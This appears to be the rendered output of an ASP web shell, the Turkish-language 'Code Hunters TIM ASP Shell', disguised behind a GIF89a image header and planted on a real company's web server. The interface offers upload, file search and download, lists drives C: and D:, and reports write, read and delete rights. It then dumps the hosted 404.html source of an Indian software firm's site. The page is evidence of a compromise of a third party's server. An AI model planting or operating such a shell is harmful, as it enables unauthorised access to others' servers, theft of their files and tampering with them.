GIF89a; Code Hunters Shell



Code Hunters TIM ASP Shell


Bulundu?unuz Dizin Upload | Dosya Arama | Dosya Indir
ROOT(Ana Klas?r) || S?r?c?ler: C:\ D:\ Klas?r izinleri: Yazma Yetkisi Var | Okuma Yetkisi Var | Silme Yetkisi Var

C:\inetpub\vhosts\prathamglobal.com\httpdocs\404.html i?eri?i


<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><![endif]-->


<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="keywords" content="Best Software Development Company in Mumbai India,GST Ready, Custom Web Development, Manufacturing ERP Software, Web Design and Development Company in Mumbai India, E-commerce web development, Mobile App Development Services, Software products company, SEO services, SMM services, SMO services, Retail software company Mumbai, ERP software, Footwear Software, Web application development company India, Retail management software, Garment manufacturing software.">
<meta name="description" content="10 Things You Must Know About Pratham Garment Solution (PGSol)">
<title>Pratham Systech India Ltd | Page Not Found</title>


<!--Meta Tag-->

<!--Meta Tag-->


<!--
<script>
(function() {
var globe = planetaryjs.planet();
// Load our custom `autorotate` plugin; see below.
globe.loadPlugin(autorotate(10));
// The `earth` plugin draws the oceans and the land; it's actually
// a combination of several separate built-in plugins.
//
// Note that we're loading a special TopoJSON file
// (world-110m-withlakes.json) so we can render lakes.
globe.loadPlugin(planetaryjs.plugins.earth({
topojson: { file: '/world-110m-withlakes.json' },
oceans: { fill: '#000080' },
land: { fill: '#339966' },
borders: { stroke: '#008000' }
}));
// Load our custom `lakes` plugin to draw lakes; see below.
globe.loadPlugin(lakes({
fill: '#000080'
}));
// The `pings` plugin draws animated pings on the globe.
globe.loadPlugin(planetaryjs.plugins.pings());
// The `zoom` and `drag` plugins enable
// manipulating the globe with the mouse.
globe.loadPlugin(planetaryjs.plugins.zoom({
scaleExtent: [100, 300]
}));
globe.loadPlugin(planetaryjs.plugins.drag({
// Dragging the globe should pause the
// automatic rotation until we release the mouse.
onDragStart: function() {
this.plugins.autorotate.pause();
},
onDragEnd: function() {
this.plugins.autorotate.resume();
}
}));
// Set up the globe's initial scale, offset, and rotation.
globe.projection.scale(175).translate([175, 175]).rotate([0, -10, 0]);

// Every few hundred milliseconds, we'll draw another random ping.
var colors = ['red', 'yellow', 'white', 'orange', 'green', 'cyan', 'pink'];
setInterval(function() {
var lat = Math.random() * 170 - 85;
var lng = Math.random() * 360 - 180;
var color = colors[Math.floor(Math.random() * colors.length)];
globe.plugins.pings.add(lng, lat, { color: color, ttl: 2000, angle: Math.random() * 10 });
}, 150);

var canvas = document.getElementById('rotatingGlobe');
// Special code to handle high-density displays (e.g. retina, some phones)
// In the future, Planetary.js will handle this by itself (or via a plugin).
if (window.devicePixelRatio == 2) {
canvas.width = 800;
canvas.height = 800;
context = canvas.getContext('2d');
context.scale(2, 2);
}
// Draw that globe!
globe.draw(canvas);

// This plugin will automatically rotate the globe around its vertical
// axis a configured number of degrees every second.
function autorotate(degPerSec) {
// Planetary.js plugins are functions that take a `planet` instance
// as an argument...
return function(planet) {
var lastTick = null;
var paused = false;
planet.plugins.autorotate = {
pause: function() { paused = true; },
resume: function() { paused = false; }
};
// ...and configure hooks into certain pieces of its lifecycle.
planet.onDraw(function() {
if (paused || !lastTick) {
lastTick = new Date();
} else {
var now = new Date();
var delta = now - lastTick;
// This plugin uses the built-in projection (provided by D3)
// to rotate the globe each time we draw it.
var rotation = planet.projection.rotate();
rotation[0] += degPerSec * delta / 1000;
if (rotation[0] >= 180) rotation[0] -= 360;
planet.projection.rotate(rotation);
lastTick = now;
}
});
};
};

// This plugin takes lake data from the special
// TopoJSON we're loading and draws them on the map.
function lakes(options) {
options = options || {};
var lakes = null;

return function(planet) {
planet.onInit(function() {
// We can access the data loaded from the TopoJSON plugin
// on its namespace on `planet.plugins`. We're loading a custom
// TopoJSON file with an object called "ne_110m_lakes".
var world = planet.plugins.topojson.world;
lakes = topojson.feature(world, world.objects.ne_110m_lakes);
});

planet.onDraw(function() {
planet.withSavedContext(function(context) {
context.beginPath();
planet.path.context(context)(lakes);
context.fillStyle = options.fill || 'black';
context.fill();
});
});
};
};
})();
</script>
-->
<!-- Navigation css & Javascript-->
<!-- <link href="assets/images/favicon.ico" rel="shortcut icon" />-->
<link href='https://fonts.googleapis.com/css?family=Coda' rel='stylesheet' type='text/css'>

<script type="text/javascript" src="assets/js/jquery.min.js"></script>

<!--Bootstrap-->
<link rel="stylesheet" href="assets/css/bootstrap/css/bootstrap.min.css" />
<script type="text/javascript" src="bootstrap/js/bootstrap.min.js"></script>
<!--Bootstrap-->

<!--Main Menu File-->
<link rel="stylesheet" type="text/css" media="all" href="assets/css/css/color.css" />
<link rel="stylesheet" type="text/css" media="all" href="assets/css/css/megamenu.css" />
<script type="text/javascript" src="js/megamenu.js"></script>
<!--Main Menu File-->

<!-- font awesome -->
<link rel="stylesheet" href="assets/css/font-awesome/css/font-awesome.min.css" />
<!-- font awesome -->

<!--For Demo Only (Remove below css file and Javascript) -->



<!-- end navigation js and css-->


<style>
#r27 .r28
{
display:none;
}

</style>




<!-- JS FILES -->
<script type= "text/javascript"SRC="assets/js/jquery-migrate-1.2.1.min.js"></script>
<script type= "text/javascript"SRC="assets/js/modernizr.custom.js"></script>
<!-- CSS FILES -->
<link href="assets/css/testimonialrotator.css" media="screen" rel="stylesheet" type="text/css">
<link href="assets/css/style.css" media="screen" rel="stylesheet" type="text/css">
<link href="assets/css/responsive.css" media="screen" rel="stylesheet" type="text/css">
<link href="assets/rs-plugin/css/settings.css" media="screen" rel="stylesheet" type="text/css">
<link href="assets/css/navstylechange.css" media="screen" rel="stylesheet" type="text/css">
<link href="assets/css/cubeportfolio.min.css" media="screen" rel="stylesheet" type="text/css">


</head>
<body>
<div id="wrapper">
<header>
<div class="top_line" >
<div class="container">
<div class="row">
<div class="col-lg-6 col-md-7 col-sm-12 col-xs-12 pull-left">
<ul class="contact-top" >
<li style=""><i class="icon-location" ></i> Mumbai, India</li>
<li style=""><i class="icon-mobile"></i> (022) 28953371 - 76</li>
<li style=""><i class="icon-mail"></i> sales@prathamglobal.com</li>
</ul>
</div>
<div class="col-lg-6 col-md-5 pull-right hidden-phone">
<ul class="social-links">
<li><a href="#"><i class="fa fa-facebook"></i></a></li>
<li><a href="#"><i class="fa fa-twitter"></i></a></li>
<li><a href="#"><i class="fa fa-pinterest"></i></a></li>
<li><a href="#"><i class="fa fa-linkedin"></i></a></li>
<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
<li><a href="#"><i class="fa fa-vk"></i></a></li>
<li id="search-btn"><a href="#"><i class="icon-search"></i></a></li>
</ul>
<div class="search-input" id="search-input" style="display: none;">
<input id="s-input" type="text" placeholder="Search...">
</div>
</div>
</div>
</div>
</div>
</header>



<div class="page_head">


<div class="container" style="margin-left:0px;margin-right:0px;">
<div class="row">
<div class="col-lg-3 pull-left"><div class="logo" style=" padding-bottom:10px;
padding-left:47px; margin-top: 2px;"><a href="index.html"><img src="assets/images/logo.jpg" alt=""></a></div></div>
<div class="col-lg-offset-2 col-lg-4 "><div class="pull-center"><img style="padding-top:35px;" src="assets/images/header.jpg" /></div></div>
<div class="col-lg-3 " >
<div class="pull-right">
<!--<canvas id='rotatingGlobe' width='400' height='400'
style='width: 400px; height: 400px; cursor: move;'></canvas>
-->
<script type="text/javascript" src="//ra.revolvermaps.com/0/0/5.js?i=0ghooeuvm66&amp;m=0&amp;s=115&amp;c=ff0000&amp;cr1=ffffff" async="async"></script>
</div>
<!-- <div class="a" id="a1">
<ul>
<li ><img src="clients/client1.jpg" /></li>
<li><img src="clients/client2.jpg" /></li>
<li><img src="clients/client3.jpg" /></li>
<li><img src="clients/client4.jpg" /></li>
<li><img src="clients/client5.jpg" /></li>
<li><img src="clients/client6.jpg" /></li>
<li><img src="clients/client7.jpg" /></li>
<li><img src="clients/client8.jpg" /></li>
<li><img src="clients/client9.jpg" /></li>

</ul>
</div>-->
<!--<iframe style="background:transparent !important" scrolling="no" frameborder="0" allowtransparency="true" width="180" height="180" src="//ra.revolvermaps.com/w/5/a/a.php?i=0settggap25&amp;m=0&amp;s=180&amp;c=ff0000&amp;cr1=ffffff"></iframe>-->

</div>
</div>
</div>




</div>
<div class="container-fluid" style="background-color:#5291E5">
<div class="row-fluid">
<div class="col-lg-12">
<div class="wsmenuexpandermain slideRight">
<a id="navToggle" class="animated-arrow slideLeft"><span></span></a>
<a href="#" class="smallogo"><img src="assets/images/logo.jpg" width="120" alt="" /></a>
<a class="callusicon" href="tel:123456789"><span class="fa fa-phone"></span></a>
</div>
<nav class="wsmenu slideLeft blue-grdt clearfix" >
<ul class="mobile-sub wsmenu-list">
<li><a href="index.html" class="active"><i class="fa fa-home"></i><span class="hometext">&nbsp;&nbsp;Home</span></a></li>
<li><a href="about.html">About<span class="arrow"></span></a>
<ul class="wsmenu-submenu">
<li><a href="about.html"><i class="fa fa-angle-right"></i>About Us</a></li>
<li><a href="whypratham.html"><i class="fa fa-angle-right"></i>Why Pratham ??&nbsp;&nbsp;</a></li>
<li><a href="mission.html"><i class="fa fa-angle-right"></i>Mission</a></li>


</li>
</ul>
</li>
<li><a href="#">Product <span class="arrow"></span></a>
<!--<div class="megamenu clearfix">

</div>-->
<ul class="wsmenu-submenu">
<li><a href="products.html"><i class="fa fa-angle-right"></i>PGSOL</a></li>
<li><a href="products.html"><i class="fa fa-angle-right"></i>EBOSOL</a></li>
<li><a href="products.html"><i class="fa fa-angle-right"></i>RETAILSOL</a></li>
<li><a href="products.html"><i class="fa fa-angle-right"></i>TEXSOL</a></li>
<li><a href="products.html"><i class="fa fa-angle-right"></i>PHARMASOL</a></li>
<li><a href="products.html"><i class="fa fa-angle-right"></i>MARCHANDISERSOL</a></li>
</ul>
</li>
<li><a href="#">Services <span class="arrow"></span></a>
<div class="megamenu clearfix ">

<div class="col-sm-4">
<h3 class="title">Web Development</h3>
<div class="fluid-width-video-wrapper"><a href="#"><img src="assets/images/webdevelopement.jpg" alt=""/></a> </div>
</div>
<div class="col-sm-4">
<h3 class="title">Web Designing</h3>
<div class="fluid-width-video-wrapper"><img src="assets/images/webdesign.jpg" alt=""/> </div>
</div>
<div class="col-sm-4">
<h3 class="title">Domain Registration & Web Hosting</h3>
<div class="fluid-width-video-wrapper"><img src="assets/images/domain.jpg" alt=""/> </div>
</div>



<div class="col-sm-4">
<h3 class="title mrgtop">E-Commerce</h3>
<div class="fluid-width-video-wrapper"><img src="assets/images/ecom.jpg" alt=""/> </div>
</div>
<div class="col-sm-4">
<h3 class="title mrgtop">Mobile App</h3>
<div class="fluid-width-video-wrapper"><img src="assets/assets/images/app.jpg" alt=""/> </div>
</div>
<div class="col-sm-4">
<h3 class="title mrgtop">SMM & SMO</h3>
<div class="fluid-width-video-wrapper"><a href="#"><img src="assets/images/social.jpg" alt=""/></a> </div>
</div>
</div>

<li><a href="#">Enquiry </a>
</li>
<li><a href="#">Downloads<span class="arrow"></span></a>
<ul class="wsmenu-submenu">
<li><a href="http://prathamglobal.com/Download/GeneralDownloads.php" target="_blank" style="color: #d41f1f !important;"><i class="fa fa-angle-right"></i>General</a></li>
<li ><a href="http://prathamglobal.com/Download/" target="_blank" style="color: #d41f1f !important;"><i class="fa fa-angle-right" ></i>Tech-Support</a></li>
</ul>


</li>
<li><a href="#">Career</a>
</li>


</li>
<li><a href="contacts.html">&nbsp;&nbsp;Contact Us </a>

</li>
</ul>
</nav>
<!--Menu HTML Code-->

</div>

</div>
</div>
<div class="page-in">
<div class="container">
<div class="row">
<div class="col-lg-6 pull-left"><div class="page-in-name">404: <span>Error</span></div></div>
<div class="col-lg-6 pull-right"><div class="page-in-bread"><span>You are here:</span> <a href="index.html">Home</a> \ 404</div></div>
</div>
</div>
</div>
<div class="container ">
<div class="row">
<div class="col-lg-12">
<div class="main_pad">
<strong class="colored oops">Oops, 404 Error!</strong><br><br>
<p>The page you were looking for could not be found.</p>
</div>
</div>
</div>
</div>
<div class="container">
</div>
<div class="container ">
</div>

<div class="footer" style="margin-top:0px;">
<div class="container">
<div class="footer-bottom">
<div class="row">
<div class="col-lg-6 col-md-6 col-sm-6 col-ms-12 pull-left">
<div class="copyright">Copyright © 2006<a href="#">Pratham Systech India Pvt. Ltd</a> <a href="#" target="_blank"></a></div>
</div>
<div class="col-lg-6 col-md-6 col-sm-6 col-ms-12 pull-right">
<div class="foot_menu">
<ul>
<li><a href="index.html">Home</a></li>
<li><a href="#">About Us</a></li>
<li><a href="#">Services</a></li>

</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div> </div>
<script type= "text/javascript"SRC="assets/js/waypoints.min.js"></script>
<script type= "text/javascript"SRC="assets/js/sticky.js"></script>
<script type= "text/javascript"SRC="assets/js/bootstrap.min.js"></script>

<script type= "text/javascript"SRC="assets/js/retina.js"></script>

<script type= "text/javascript"SRC="assets/js/jquery.dlmenu.js"></script>
<script type= "text/javascript"SRC="assets/js/main.js"></script>
</body>
</html>





Code Hunters Shelli Serverdan Sil

Code Hunters TIM © 2011